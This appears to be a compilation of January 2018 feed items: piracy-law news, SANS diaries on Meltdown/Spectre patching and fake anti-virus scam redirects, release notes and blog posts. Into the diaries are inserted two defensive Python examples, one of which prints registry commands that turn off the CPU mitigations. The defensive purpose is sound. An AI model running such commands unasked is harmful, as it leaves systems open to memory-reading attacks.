Of course, running parallel is the multi-billion dollar issue of intellectual property infringement. Eighteen years on from the first wave of mass online piracy and the majority of popular movies, TV shows, games, software and books are still available to download.
Over the past couple of years and increasingly in recent months, there have been clear signs that the EU in particular wishes to collectively mitigate the spread of all illegal content – from ISIS videos to pirated Hollywood movies – with assistance from major tech companies.
Google, YouTube, Facebook and Twitter are all expected to do their part, with the looming stick of legislation behind the collaborative carrots, should they fail to come up with a solution.
To that end, five EU Commissioners – Dimitris Avramopoulos, Elżbieta Bieńkowska, Věra Jourová, Julian King and Mariya Gabriel – will meet today in Brussels with representatives of several online platforms to discuss progress made in dealing with the spread of the aforementioned material.
In a joint statement together with EC Vice-President Andrus Ansip, the Commissioners describe all illegal content as a threat to security, safety, and fundamental rights, demanding a “collective response – from all actors, including the internet industry.”
They note that online platforms have committed significant resources towards removing violent and extremist content, including via automated removal, but more needs to be done to tackle the issue.
“This is starting to achieve results. However, even if tens of thousands of pieces of illegal content have been taken down, there are still hundreds of thousands more out there,” the Commissioners write.
“And removal needs to be speedy: the longer illegal material stays online, the greater its reach, the more it can spread and grow. Building on the current voluntary approach, more efforts and progress have to be made.”
The Commission says it is relying on online platforms such as Google and Facebook to “step up and speed up their efforts to tackle these threats quickly and comprehensively.” This should include closer cooperation with law enforcement, sharing of information with other online players, plus action to ensure that once taken down, illegal content does not simply reappear.
While it’s clear that the EC would prefer to work collaboratively with the platforms to find a solution to the illegal content problem, as expected there’s the veiled threat of them being compelled by law to do so, should they fall short of their responsibilities.
“We will continue to promote cooperation with social media companies to detect and remove terrorist and other illegal content online, and if necessary, propose legislation to complement the existing regulatory framework,” the EC warns.
Today’s discussions run both in parallel and in tandem with others specifically targeted at intellectual property abuses. In late November the EC presented a set of new measures to ensure that copyright holders are well protected both online and in the physical realm.
A key aim is to focus on large-scale facilitators, such as pirate site operators, while cutting their revenue streams.
“The Commission seeks to deprive commercial-scale IP infringers of the revenue flows that make their criminal activity lucrative – this is the so-called ‘follow the money’ approach which focuses on the ‘big fish’ rather than individuals,” the Commission explained.
This presentation followed on the heels of a proposal last September which had the EC advocating the take-down-stay-down principle, with pirate content being taken down, automated filters ensuring infringement can be tackled proactively, with measures being taken against repeat infringers.
Again, the EC warned that should cooperation with Internet platforms fail to come up with results, future legislation cannot be ruled out.
Source: TF, for the latest info on copyright, file-sharing, torrent sites and more. We also have VPN discounts, offers and coupons
Own on install. How grave is it?
This is well known, but I haven't seen it discussed. In short, doing a clean install (factory defaults) leaves a window of opportunity during which the device is vulnerable to a known network attack. It used to be common sense to reinstall after a compromise (this probably doesn't apply to the windows world, where the antivirus takes care of it). All versions of windoze are affected by the SMB bug to my knowledge. Debian jessie (old stable) is vulnerable to the malicious mirror attack. Of more interest to me are devices where the installation media is fixed and can't be changed. This includes smartphones and wireless routers. Some smartphones might be vulnerable to wifi RCE (found by google?). Some wireless routers might be vulnerable to wifi RCE or a default admin password attack over wifi. The Internet of Things will make things worse (some NAS devices are affected). Shielding the device might not be a solution since updates must be applied. Are the above concerns real? Has this been studied systematically?
01/08/18 PHD comic: 'Number of Side Projects'
Piled Higher & Deeper by Jorge Cham, www.phdcomics.com. "Number of Side Projects", originally published 1/8/2018.
ISC Stormcast For Tuesday, January 9th 2018 https://isc.sans.edu/podcastdetail.html?id=5817, (Tue, Jan 9th) (c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
January 08, 2018
Comic for January 08, 2018 Dilbert readers - Please visit Dilbert.com to read this feature. Due to changes with our feeds, we are now making this RSS feed a link to Dilbert.com.
TVAddons and ZemTV Ask Court to Dismiss U.S. Piracy Lawsuit
Last year, American satellite and broadcast provider Dish Network targeted two well-known players in the third-party Kodi add-on ecosystem.
In a complaint filed in a federal court in Texas, add-on ZemTV and the TVAddons library were accused of copyright infringement. As a result, both are facing up to $150,000 in damages for each offense.
While the case was filed in Texas, neither of the defendants live there, or even in the United States. The owner and operator of TVAddons is Adam Lackman, who resides in Montreal, Canada. ZemTV’s developer Shahjahan Durrani is even further away in London, UK.
Their limited connection to Texas is reason for the case to be dismissed, according to the legal team of the two defendants. They are represented by attorneys Erin Russel and Jason Sweet, who asked the Court to drop the case late last week.
According to their motion, the Texas District Court does not have jurisdiction over the two defendants.
“Lackman and Durrani have never been residents or citizens of Texas; they have never owned property in Texas; they have never voted in Texas; they have never personally visited Texas; they have never directed any business activity of any kind to anyone in Texas […] and they have never earned income in Texas,” the motion reads.
Technically, defendants can be sued in a district they have never been, as long as they “directed actions” at the state or its citizens.
According to Dish, this is the case here since both defendants made their services available to local residents, among other things. However, the defense team argues that’s not enough to establish jurisdiction in this case.
“Plaintiff’s conclusory allegation that Lackman and Durrani marketed, made available, and distributed ZemTV service and the ZemTV add-on to consumers in the State of Texas and the Southern District of Texas is misleading at best,” the attorneys write.
If the case proceeds, this would go against the US Constitution by violating the defendants’ due process rights. Whether the infringement claims hold ground or not, Dish has no right to sue, according to the defense.
“Defendants are citizens of Canada and Great Britain and have not had sufficient contacts in the State of Texas for this Court to exercise personal jurisdiction over them. To do so would violate the Due Process Clause of the United States Constitution.”
The Court must now decide whether the case can proceed or not. TorrentFreak reached out to TVAddons but the service wishes to refrain from commenting on the proceeding at the moment.
Previously, TVAddons made it clear that it sees the Dish lawsuit as an attempt to destroy the Kodi addon community. One of the methods of attack it mentioned, was to sue people in foreign jurisdictions.
“Most people don’t have money lying around to hire lawyers in places they’ve never even visited. This means that if a company sues you in a foreign country and you can’t afford a lawyer, you’re screwed even if you did nothing wrong,” TVAddons wrote at the time.
—
A copy of the motion to dismiss is available here (pdf).
Source: TF, for the latest info on copyright, file-sharing, torrent sites and more. We also have VPN discounts, offers and coupons
MusE 3.0.0 released Three years after the last stable release, version 3.0 of the MusE MIDI/Audio sequencer is now available. As you might expect there many changes since the last release including a switch to Qt5, a new Plugin Path editor in Global Settings, a mixer makeover with lots of fixes, a system-wide move to double precision of all audio paths, and much more.
Security updates for Monday Security updates have been issued by Arch Linux (linux-hardened, linux-lts, linux-zen, and mongodb), Debian (gdk-pixbuf, gifsicle, graphicsmagick, kernel, and poppler), Fedora (dracut, electron-cash, and firefox), Gentoo (backintime, binutils, chromium, emacs, libXcursor, miniupnpc, openssh, optipng, and webkit-gtk), Mageia (kernel, kernel-linus, kernel-tmb, openafs, and python-mistune), openSUSE (clamav-database, ImageMagick, kernel-firmware, nodejs4, and qemu), Red Hat (linux-firmware, ovirt-guest-agent-docker, qemu-kvm-rhev, redhat-virtualization-host, rhev-hypervisor7, rhvm-appliance, thunderbird, and vdsm), Scientific Linux (thunderbird), SUSE (kernel and qemu), and Ubuntu (firefox and poppler).
Meltdown and Spectre: clearing up the confusion, (Mon, Jan 8th)
Unless you’ve been living under a rock (or on a remote island, with no Internet connection), you’ve heard about the latest vulnerabilities that impact modern processors.
I’m sure that most of our readers are scrambling to assess the risk, patch systems and whatnot, so we have decided to write a diary that clears up the confusion a bit and points out some important things that people might not be aware of.
What is this all about?
First, if you haven’t already listened to SANS’ webcast about Meltdown and Spectre by Jake Williams, I strongly suggest that you go and do that – the recording is available at https://www.youtube.com/watch?v=8FFSQwrLsfE
Jake explains everything pretty well (although I think with some minor errors about Spectre that I will try to clear below).
In a nut shell, what do these two vulnerabilities allow an attacker to do?
While I won’t go into the technical details here (they are complex; in my opinion this was amazing research, although Google’s blog post could have been a bit easier to read :)), here is what it boils down to:
- Meltdown allows a local, unprivileged (userland) process to read the contents of any memory mapped into its address space, regardless of page permissions. On an unpatched kernel that includes kernel memory, which is why this vulnerability is dangerous.
- Spectre allows a local, unprivileged (userland) process to read the memory of other processes (this is the part where Jake’s presentation was perhaps not so clear). Update 2:
An earlier version of this diary stated that Spectre does not allow reading kernel memory; it now looks as if Spectre can indeed be used to read kernel memory. Additionally, while it is perhaps not 100% clear, Google’s blog post (https://googleprojectzero.blogspot.hr/2018/01/reading-privileged-memory-with-side.html) strongly suggests that the attack works cross-process.
There is a Spectre PoC out, but it uses a single process: a secret is placed in memory as a character array and then read back by exploiting the vulnerability. This led people to believe the attack is intra-process only, but it is actually a cross-process memory read (see the Spectre paper, page 2, “Attacks using Native Code”).
Ok, now that we know what the vulnerabilities are about we can assess the risk: as you can see, in both cases, an attacker actually needs to run some code on the target machine to exploit these vulnerabilities.
This puts the following at highest risk:
- Anything that runs untrusted code on your machine (a browser typically),
- Anything running in virtualization or clouds.
So, for a typical company, on your Domain Controller (for example), the risk is actually very, very low: since you are not running untrusted code there (hopefully), an attacker should not be able to exploit these vulnerabilities in the first place.
For a typical user the browser presents the highest risk, but we have yet to see proof-of-concept code that exploits this vulnerability through JavaScript, and browser vendors have started shipping mitigations (Mozilla, for example, released Firefox 57.0.4, which reduces the precision of time sources to make attacks such as Spectre harder or impossible). If you run everything as Administrator, Spectre changes little for you: code that already runs as Administrator does not need a side channel to read other processes’ memory.
In other words: the world will not end over the weekend.
What to do now?
Keep an eye on the development and patches released by vendors, but not differently than other patches.
Rather, pay special attention to the impact of the patches: there are known cases where AV programs caused BSODs on systems with the patch installed. This is why Microsoft added a check for a registry key that the AV program must set to indicate that it is compatible with the patch: if the key is not present, the patch will not be installed!
If you are installing the patch on a Windows server: be aware that besides installing the patch, a registry key needs to be added manually to enable it: https://support.microsoft.com/en-us/help/4072698/windows-server-guidance-to-protect-against-the-speculative-execution
Without this registry key nothing will happen. Microsoft presumably added this because on servers, impact to performance might be higher (so it’s up to you to take the risk … or not). Test, test, test.
The good thing with this approach is that, once you install the patch and enable the mitigations: if your system blows up you can change the registry keys and disable the mitigations. This will allow you to try out the patch. As I said: test, test, test.
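The enable/test/roll-back procedure above boils down to two registry values plus the AV compatibility marker. The script below is an added example, not part of the diary or of Microsoft's guidance: it reads the values Microsoft's server guidance (KB4072698, linked above) documents, says which state the machine is in, and prints the `reg add` lines for the roll-back the text describes. The documented pairs are (FeatureSettingsOverride, FeatureSettingsOverrideMask) = (0, 3) to enable and (3, 3) to disable; treating any other combination as "unrecognised" is a conservative choice of this example. The default-state logic follows the diary: servers are off until the keys are set, clients are on. Whether the host is a server is passed in rather than detected. On a non-Windows machine the `winreg` module is absent and only the pure functions are usable.

```python
"""Check and roll back the registry state behind the January 2018 Meltdown/Spectre patch on Windows."""
import platform

try:
    import winreg  # standard library, Windows only
except ImportError:  # Linux/macOS: registry reads are skipped, pure functions still work
    winreg = None

MM_PATH = r"SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management"
QC_PATH = r"SOFTWARE\Microsoft\Windows\CurrentVersion\QualityCompat"
# Marker the AV product must set before Windows Update offers the January 2018 update.
QC_VALUE = "cadca5fe-87d3-4b96-b7fb-a231484277cc"
# Documented value pairs from KB4072698: (FeatureSettingsOverride, FeatureSettingsOverrideMask).
ENABLE_PAIR = (0, 3)
DISABLE_PAIR = (3, 3)


def classify(override, mask, is_server):
    """Interpret the two DWORDs; None means the value is absent from the registry."""
    if override is None or mask is None:
        if is_server:
            return "default: mitigations OFF (server, keys not set)"
        return "default: mitigations ON (client)"
    if (override, mask) == ENABLE_PAIR:
        return "mitigations ON"
    if (override, mask) == DISABLE_PAIR:
        return "mitigations OFF (explicitly disabled)"
    # Assumption of this example: anything undocumented is flagged rather than guessed at.
    return f"unrecognised pair override={override} mask={mask}: compare against vendor guidance"


def reg_commands(enable):
    """reg.exe lines to enable (after patching) or disable (roll-back if the system blows up)."""
    override, mask = ENABLE_PAIR if enable else DISABLE_PAIR
    key = f'"HKLM\\{MM_PATH}"'
    return [f"reg add {key} /v FeatureSettingsOverride /t REG_DWORD /d {override} /f",
            f"reg add {key} /v FeatureSettingsOverrideMask /t REG_DWORD /d {mask} /f"]


def _read_dword(path, name):
    """Return a REG_DWORD under HKLM, or None if the key/value is missing or we are not on Windows."""
    if winreg is None:
        return None
    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, path) as key:
            value, kind = winreg.QueryValueEx(key, name)
    except OSError:
        return None
    return value if kind == winreg.REG_DWORD else None


def report(is_server):
    """Collect the three things to check before and after deploying the patch."""
    override = _read_dword(MM_PATH, "FeatureSettingsOverride")
    mask = _read_dword(MM_PATH, "FeatureSettingsOverrideMask")
    return {
        "platform": platform.system(),
        "registry_read": winreg is not None,
        "av_compat_key_present": _read_dword(QC_PATH, QC_VALUE) is not None,
        "state": classify(override, mask, is_server),
        "rollback": reg_commands(enable=False),
    }


if __name__ == "__main__":
    for k, v in report(is_server=True).items():
        print(f"{k}: {v}")
```

Run it once before patching (the AV marker decides whether the update is offered at all), once after (the state should read ON on a server only after you add the keys), and keep the printed roll-back lines at hand while testing. The registry only tells you what the OS will try to do; as the update below notes, the CVE-2017-5715 part additionally depends on a microcode update being present.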
Update 1: fellow handler Didier Stevens tested the patches on the Windows platform; as the screenshot below shows, the mitigation for Spectre variant 2 (CVE-2017-5715) requires a firmware (microcode) update as well.
This means that, if there is no firmware update for your platform, that part of the patch is currently ineffective: the CVE-2017-5715 mitigation stays inactive until the microcode arrives.

Update 3: CPU firmware (microcode updates) can certainly be delivered by the OS vendors, and there have been such cases in the past. This makes it much better for the end-users, since a BIOS update will not be required.
However, there is a down side with this approach: such microcode updates are lost when the CPU is reset or powered down. It means that they need to be applied every time the system boots up. Still, it's a viable solution.
Checking the updates released so far, Red Hat, for example, appears to have included microcode updates in its patches (although only for a few CPU families, it seems). Microsoft has not done so (who knows why, or whether it will).
Update 1/8/2018: Some vendors have already released BIOS updates that mitigate the mentioned issues, so check their web pages (I have verified that Lenovo has released BIOS updates, and successfully installed them).
Finally, we have yet to see what other impacts these (huge) changes will have, besides reducing performance. For example, it appears that the patches will impact ability to capture RAM contents, which might further impact various forensics activities.
We are carefully monitoring everything around these vulnerabilities and will, as always, try to be your source of clear and precise information.
If you have something to add, please contact us here – especially if there are errors in the diary (or post a comment).
Some predictions for 2018
Some predictions for 2018:
1. Major malware(s) spreading via Intel ME and the like. Significantly worse than wannacry. Possibly hard to clean, requiring reprogramming the chip on an external device.
2. Major Android malware(s).
3. m$ windows will suck so much, computer illiterate people will be ready to pay for just literally "uninstalling windows"
4. bitcoin will at least temporarily lose the first place on https://coinmarketcap.com (this is not a rigorous metric)
Tourist Scams
A comprehensive list. Most are old and obvious, but there are some clever variants.
Sky Hits Man With £5k ‘Fine’ For Pirating Boxing on Facebook
When people download content online using BitTorrent, they also distribute that content to others. This unlawful distribution attracts negative attention from rightsholders, who have sued hundreds of thousands of individuals worldwide.
Streaming is considered a much safer method to obtain content, since it’s difficult for content owners to track downloaders. However, the same can’t be said about those who stream content to the web for the benefit of others, as an interesting case in the UK has just revealed.
It involves 34-year-old Craig Foster, who received several scary letters from lawyers representing broadcaster Sky. The company alleged that during last April’s bout between Anthony Joshua and Wladimir Klitschko, Foster live-streamed the multiple world title fight on Facebook Live.
Financially, this was a major problem for Sky, law firm Foot Anstey LLP told Foster. According to their calculations, at least 4,250 people watched the stream without paying Sky Box Office the going rate of £19.95 each. Based on figures from Sky’s own systems, the broadcaster concluded that Foster owed the company £85,000.
But according to The Mirror, father-of-one Foster wasn’t actually to blame.
“I’d paid for the boxing, it wasn’t like I was making any money. My iPad was signed in to my Facebook account and my friend just started streaming the fight. I didn’t think anything of it, then a few days later they cut my subscription,” Foster said.
“They’re demanding the names and addresses of all my mates who were round that night but I’m not going to give them up. I said I’d take the rap.”
While Foster says he won’t turn in the culprit, there’s no doubt that the fight stream originated from his Sky account. The TV giant embeds watermarks in its broadcasts which enables it to see who paid for an event, should a copy of one turn up on the Internet.
As we reported last year following the Mayweather v McGregor super-fight, the codes are clearly visible with the naked eye.

While taking the rap for someone else’s infringing behavior isn’t something anyone should do lightly, it appears that Scarborough-based Foster did just that.
According to Neil Parkes, who specializes in media litigation, content protection and contentious IP at Foot Anstey, Foster accepted responsibility and agreed to pay a settlement.
“Mr Foster broke the law,” Parkes said. “He has acknowledged his wrongdoing, apologised and signed a legally binding agreement to pay a sum of £5,000 to Sky.”
The Mirror, however, has Foster backtracking. He says he wasn’t given enough time to consider his position and now wants to fight Sky in court.
“It’s heavy-handed. I’ve apologized and told them we were drunk,” Foster said.
“I know streaming the fight was wrong. I didn’t stop my friend but I was watching the boxing. I’m just a bloke who had a few drinks with his friends.”
Unless he can find a law firm willing to fight his corner at a hugely cut-down rate, Foster will find this kind of legal fisticuffs to be a massively expensive proposition, one in which he will start out as the clear underdog.
Not only was Foster’s Sky account the originating source, both his iPad and his Facebook account were used to stream the fight. On top of what appears to be a signed confession, he also promised not to do anything else like this in future. Furthermore, he even agreed to issue an apology that Sky can use in future anti-piracy messages.
Of course, Foster might indeed be a noble gentleman but he should be aware that as a civil matter, this fight would be decided on the balance of probabilities, not beyond reasonable doubt. If the judge decides 51% in Sky’s favor, he suffers a knockout along with a huge financial headache.
No one wants a £5,000 bill but that’s a drop in the ocean compared to the cost implications of losing this case.
Source: TF, for the latest info on copyright, file-sharing, torrent sites and more. We also have VPN discounts, offers and coupons
Top 10 Most Pirated Movies of The Week on BitTorrent – 01/08/18
This week we have two newcomers in our chart.
Blade Runner 2049 is the most downloaded movie again.
The data for our weekly download chart is estimated by TorrentFreak, and is for informational and educational reference only. All the movies in the list are Web-DL/Webrip/HDRip/BDrip/DVDrip unless stated otherwise.
RSS feed for the weekly movie download chart.
This week’s most downloaded movies are:
| Movie Rank | Rank last week | Movie name | IMDb Rating / Trailer |
|---|---|---|---|
| Most downloaded movies via torrents | |||
| 1 | (1) | Blade Runner 2049 | 8.9 / trailer |
| 2 | (10) | Coco (HDTS/DVDscr) | 8.9 / trailer |
| 3 | (2) | Justice League | 7.1 / trailer |
| 4 | (…) | Jumanji: Welcome to the Jungle | 7.3 / trailer |
| 5 | (3) | Bright | 6.7 / trailer |
| 6 | (8) | The Foreigner | 7.2 / trailer |
| 7 | (5) | Dunkirk | 8.3 / trailer |
| 8 | (9) | It | 7.6 / trailer |
| 9 | (…) | Renegades | 5.5 / trailer |
| 10 | (6) | Kingsman: The Golden Circle | 7.2 / trailer |
Source: TF, for the latest info on copyright, file-sharing, torrent sites and more. We also have VPN discounts, offers and coupons
Fake anti-virus pages popping up like weeds, (Mon, Jan 8th)
Introduction
With recent media coverage on Meltdown and Spectre, many other security issues get buried in the mix. One such issue I've run across for many months now is fake anti-virus (AV) web pages or other unwanted destinations that pop up after viewing a legitimate, but compromised, website.

Shown above: Flow chart for this activity.
Last week, with the help of @baberpervez2, I found several compromised sites leading to these fake AV pages and other unwanted destinations. They all had the same characteristics, and I documented how these compromised sites could be found through Google (link). However, that particular campaign isn't the only one pushing fake AV pages. I've run across at least one other campaign, which I've documented in this diary.
Details
Below is an example of a fake AV page as seen on a Windows host using Google Chrome. When I used Internet Explorer, I could not close the popup notifications (they just reappeared), and the browser window would not close unless I killed the process using Task Manager. This is a social engineering scheme to trick people into calling a fake tech support phone number. Once you call the number, a fake support technician will walk you through several steps to supposedly fix your computer. Eventually, you'll be asked for a credit card number to pay for this service.

Shown above: Example of a fake AV page as seen in Google Chrome.
Judging by the amount of fake AV pages I've come across over the past few months, this type of tech support scam is increasingly popular. It relies on a large pool of potential victims world-wide. IT professionals may scoff at these attempts, but using a computer is a lot like driving a car. Most people can effectively drive a car without fully knowing how it works. The same is true for most computer users. Our culture of computer use creates a ready pool of potential victims for this sort of scam.
Another key component for these campaigns is the availability of countless servers world-wide that can be compromised. Server administration is a continual job that involves frequent patching and software updates. It is incredibly easy for legitimate websites to fall behind in their security-related patches. Such servers are often compromised and used for this activity.
From these compromised sites, we see injected script that leads to a fake AV page or some other unwanted destination. What does the injected script look like? I've highlighted an example in the image below.

Shown above: An example of injected script from this campaign.
In the image above, the injected script ends with a call to a .tk domain that, in turn, leads to another .tk domain for the fake AV page. These domains frequently change, so blocking one of them is only effective for about an hour or so. These new domains usually change only a few characters from the previous ones.
Below is an example of the traffic filtered in Wireshark. This shows the compromised site, the first .tk domain, and the second .tk domain hosting a fake AV page. The fake AV page has several HTTP GET requests for associated images and other items.

Shown above: An example of the traffic filtered in Wireshark.
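The redirect chain described above (compromised site, first .tk domain, second .tk domain serving the fake AV page) can be reconstructed from the Referer headers in proxy or pcap-derived request logs, and the observation that rotated domains differ by only a few characters suggests matching new hosts against known ones by edit distance instead of exact string. The script below is an added example, not code from the diary or its author; the log lines, hostnames and the "known bad" domain are constructed placeholders, and the log format (timestamp, method, URL, Referer) is an assumption.

```python
"""Rebuild a compromised-site -> .tk -> .tk chain from HTTP request records
and flag .tk hosts that are near-duplicates of a previously seen one.
Added example; all hostnames below are constructed, not real indicators."""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample log: "<timestamp> <method> <url> <referer-or-dash>"
SAMPLE_LOG = """\
2018-01-11T14:02:03Z GET http://compromised-blog.example/index.php -
2018-01-11T14:02:04Z GET http://compromised-blog.example/css/style.css http://compromised-blog.example/index.php
2018-01-11T14:02:04Z GET http://azq1234wer.tk/go.php http://compromised-blog.example/index.php
2018-01-11T14:02:05Z GET http://azq1298wer.tk/alert/index.html http://azq1234wer.tk/go.php
2018-01-11T14:02:05Z GET http://azq1298wer.tk/alert/img/logo.png http://azq1298wer.tk/alert/index.html
2018-01-11T14:02:05Z GET http://azq1298wer.tk/alert/img/lock.png http://azq1298wer.tk/alert/index.html
2018-01-11T14:02:06Z GET http://cdn-static.example/jquery.js http://compromised-blog.example/index.php
"""

LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(\S+)$")


def parse_line(line):
    """Split one log line into timestamp, method, host, path and referring host."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts, method, url, referer = m.groups()
    parts = urlsplit(url)
    return {
        "ts": ts,
        "method": method,
        "host": parts.hostname or "",
        "path": parts.path,
        "ref_host": urlsplit(referer).hostname if referer != "-" else None,
    }


def parse_log(text):
    return [r for r in (parse_line(l) for l in text.splitlines()) if r]


def referral_graph(records):
    """host -> ordered list of other hosts it sent the browser to (cross-host edges only)."""
    graph = defaultdict(list)
    for r in records:
        ref = r["ref_host"]
        if ref and ref != r["host"] and r["host"] not in graph[ref]:
            graph[ref].append(r["host"])
    return graph


def redirect_chain(records, start_host, watched_tlds=(".tk",)):
    """Follow referrals from start_host, keeping only hops into watched TLDs."""
    graph = referral_graph(records)
    chain, seen, current = [start_host], {start_host}, start_host
    while True:
        nxt = [h for h in graph.get(current, []) if h.endswith(watched_tlds) and h not in seen]
        if not nxt:
            return chain
        current = nxt[0]
        chain.append(current)
        seen.add(current)


def levenshtein(a, b):
    """Plain edit distance; small enough to inline rather than pull a dependency."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def near_duplicates(hosts, known_bad, max_dist=3):
    """Map each host to the first known-bad domain within max_dist edits of it."""
    hits = {}
    for h in hosts:
        for bad in known_bad:
            if h != bad and levenshtein(h, bad) <= max_dist:
                hits[h] = bad
                break
    return hits


def analyze(log_text, start_host, known_bad=(), watched_tlds=(".tk",)):
    records = parse_log(log_text)
    chain = redirect_chain(records, start_host, watched_tlds)
    landing = chain[-1] if len(chain) > 1 else None
    watched_hosts = sorted({r["host"] for r in records if r["host"].endswith(watched_tlds)})
    return {
        "chain": chain,
        # GET requests against the final host: the page plus its images and other items
        "landing_assets": [r["path"] for r in records if r["host"] == landing and r["method"] == "GET"],
        "rotated": near_duplicates(watched_hosts, known_bad),
    }


if __name__ == "__main__":
    result = analyze(SAMPLE_LOG, "compromised-blog.example", known_bad=("azq1234wer.tk",))
    print("chain:", " -> ".join(result["chain"]))
    print("landing page assets:", result["landing_assets"])
    print("rotated domains:", result["rotated"])
```

The edit-distance threshold of 3 is a tuning choice: it catches the "a few characters changed" rotation the diary describes while still requiring the same length and structure, so an unrelated .tk host is not matched by accident. In practice the known-bad list would come from the previous hour's detections rather than a hard-coded tuple.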
Final words
An example of the traffic for the above fake AV activity can be found here. This is not an isolated incident, and I expect we'll see more fake AV pages and associated tech support scams in 2018. Although we'll continue to see actual malware, I believe it will remain just as (if not more) profitable for criminals to social engineer victims into providing access to their computers and credit card information.
---
Brad Duncan
brad [at] malware-traffic-analysis.net
Kernel prepatch 4.15-rc7 Linus has released the 4.15-rc7 kernel prepatch. "Ok, we had an interesting week, and by now everybody knows why we were merging all those odd x86 page table isolation patches without following all of the normal release timing rules. But rc7 itself is actually pretty calm. "
ISC Stormcast For Monday, January 8th 2018 https://isc.sans.edu/podcastdetail.html?id=5815, (Mon, Jan 8th) (c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
On Levcoin and ethics
Recently I came across the news about the creation of a new cryptocurrency – Levcoin.
I laughed. More than once I have thought about making a cryptocurrency myself – it is no more than a day's work. What has always stopped me is the question of how it would be useful, new and necessary in a way that distinguishes it from the ones already available. I have not managed to come up with a difference worth the effort.
Is it worth it for the cryptocurrency to be Bulgarian? I doubt it – Bulgarians can perfectly well use the existing supranational cryptocurrencies. But it doesn't hurt either. After all, there are people who define themselves first as Bulgarians and then as everything else (if there is anything). So why not? Well done to Dobri Bozhilov, it will be of use to someone.
Then, however, I took a look at its code. And at its blockchain. And I scratched my head.
You know that Bitcoin will reach a maximum of 21 million coins, right? In the same way, Levcoin will reach a maximum of 9 million coins. So far so good – that is not so important.
What turned out to be important and interesting to me is that 1 million of those coins are "pre-mined". By the currency's creator, for personal use.
And that is not necessarily a crime. Satoshi Nakamoto also ended up with almost 1 million bitcoins. The creators of Ethereum and many other currencies have also set aside some share for themselves.
What I find scandalous is the reserved percentage of coins – around 11% of all possible ones. Directly, and from the very start. Satoshi Nakamoto accumulated his bitcoins while mining alone to keep the blockchain going, waiting for other people to become convinced and join. The Ethereum developers reserved an incomparably smaller percentage for themselves, and they created smart contracts and all sorts of other capabilities. To reserve for yourself over 10% of the entire possible supply of a cryptocurrency because you put in one day of work that is easy for any programmer is the most shameless greed and lack of ethics I have seen. (Perhaps with the exception of the Ripple team – they reserved even more for themselves. Which shapes my opinion of that currency.)
If I set the servers I control to mine this currency, I would most likely bite off a solid piece of the Levcoin pie. But the ethics around it disgust me to the point that the piece would stick in my throat. I have nothing against being rich – but not at such a price.
(And I could do much more. I could literally make a cryptocurrency in a day for, say, ecologists. For science fiction fans. For supporting the development of artificial intelligence. A homeopathic one, with beneficial bioenergetic ultra-red emissions, made of one hundred percent recycled electrons… Then I would most likely end up with much more money, even if I kept a smaller percentage for myself.)
Think what you will of me. Am I mad? The mad ones, the mad ones – long may they live.
January 07, 2018
Comic for January 07, 2018 Dilbert readers - Please visit Dilbert.com to read this feature. Due to changes with our feeds, we are now making this RSS feed a link to Dilbert.com.